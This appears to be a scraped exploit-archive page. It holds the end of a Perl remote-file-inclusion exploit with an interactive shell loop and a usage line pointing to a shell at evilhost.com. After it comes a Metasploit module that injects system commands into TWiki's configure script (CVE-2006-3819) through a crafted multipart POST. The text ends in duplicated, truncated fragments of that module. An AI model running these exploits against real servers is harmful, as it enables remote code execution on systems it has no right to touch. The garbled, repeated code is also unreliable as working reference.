elsif ($info =~/failed to open stream: HTTP request failed!/ || $info =~/: Cannot execute a blank command in <b>/) { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n"; exit; } elsif ($info =~/^<br.\/>.<b>Warning/) { print "\nInvalid Command\n\n"; }; if($info =~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/) { $final = $1; $final=~ tr/[ê]/[\n]/; print "\n$final\n"; last; } else { print "[shell] \$"; } } } last; sub header() { print q{ ****************************************************************** ************* Tucows open Project Remote Include Exploit Vulnerablity found by: Dr Max Virus Exploit [c]oded by: Dr Max Virus ****************************************************************** ************ } } sub usg() { header(); print q{ Usage: perl exploit.pl [tucows fullpath] [Shell Location] [Shell Cmd] [tucows FULL PATH] - Path to site exp. www.site.com [shell Location] - Path to shell exp. www.evilhost.com/shell.txt [shell Cmd Variable] - Command variable for php shell Example: perl exploit.pl http://www.site.com/[tucows]/ ****************************************************************** ************** }; exit(); } black_hat_cr(HCE) TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta) Code: ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::twiki_config_typeof; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { 'HttpBoundary' => ['Mtb06z', 'HTTP boundary'] }; my $info = { 'Name' => 'Twiki Configure script TYPEOF Parameter Remote Command Execution', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'David Maciejak <david dot maciejak at gmail dot com>' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'DIR' => [1, 'DATA', 'Directory of Twiki', '/twiki'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits an arbitrary command execution vulnerability in the Twiki configure script. All versions of Twiki prior to 4.0.4 hotfix 2 are vulnerable. Patch HotFix04x00x04x02 is available on twiki.org homepage. }), 'Refs' => [ ['BID', '19188'], ['CVE', '2006-3819'], ['OSVDB', '27556'], ], 'Payload' => { 'Space' => 128, 'Keys' => ['cmd','cmd_bash'], }, 'Keys' => ['twiki'], 'DisclosureDate' => 'Jul 27 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->VHost; my $target_port = $self->GetVar('RPORT'); my $dir = $self->GetVar('DIR'); my $encodedPayload = $self->GetVar('EncodedPayload'); my $cmd = $encodedPayload->RawPayload; my $boundary = $self->GetLocal('HttpBoundary'); $cmd= "\r\n ".$boundary."\r\n". "Content-Disposition: form-data; name=\"action\"\r\n\r\n". "update\r\n". " ".$boundary. "Content-Disposition: form-data; name=\"TYPEOF:{system('$cmd')}\"\r\n\r\n". "BOOLEAN\r\n". " ".$boundary; my $proto="http"; if ($self->GetVar('SSL')) { $proto.="s"; } my $request = "POST ".$dir."/bin/configure HTTP/1.1\r\n". "Content-Type: multipart/form-data; boundary=".$boundary."\r\n". "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\r\n". "Host: $target_host\r\n". "Referer: ".$proto."://".$target_host.$dir."/bin/configure\r\n". "Accept: image/gif, image/x-xbitmap, image/jpeg, image/png\r\n". "Accept-Language: en\r\n". "Content-Length: ". length($cmd). "\r\n\r\n". $cmd; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $s->Send($request); my $results = $s->Recv(-1, 200); if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){ my @extract_result; my @results = split ( /\r\n/, $results ); chomp @results; my $fill_extract_result=0; my $end_break=0; my $i=0; while ( !$end_break && ($i < @results)){ if ($results[$i] =~ /\<div id=\"patternScreen\"\>/) . <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta) Code: ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in. = "POST ".$dir."/bin/configure HTTP/1.1 ". "Content-Type: multipart/form-data; boundary=".$boundary." ". "User-Agent: Mozilla/4.76 [en]